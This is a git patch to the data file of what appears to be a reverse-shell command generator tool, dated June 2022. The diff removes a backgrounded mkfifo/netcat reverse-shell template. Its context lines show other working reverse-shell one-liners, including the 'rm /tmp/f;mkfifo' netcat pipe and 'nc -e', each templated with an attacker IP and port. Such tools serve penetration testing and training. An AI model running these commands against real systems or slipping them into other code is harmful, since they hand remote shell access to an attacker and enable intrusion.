From 6dda01a4615fcde3ea15ecdc794c77346743da0b Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Mon, 6 Jun 2022 11:57:14 -0400 Subject: [PATCH] Update data.js Removed mkfifo background for now --- js/data.js | 5 ----- 1 file changed, 5 deletions(-) diff --git a/js/data.js b/js/data.js index 8556954..e02ac83 100644 --- a/js/data.js +++ b/js/data.js @@ -50,11 +50,6 @@ const reverseShellCommands = withCommandType( "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f", "meta": ["linux", "mac"] }, - { - "name:" "mkfifo background", - "command": "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &", - "meta": ["linux", "mac"] - }, { "name": "nc -e", "command": "nc -e {shell} {ip} {port}",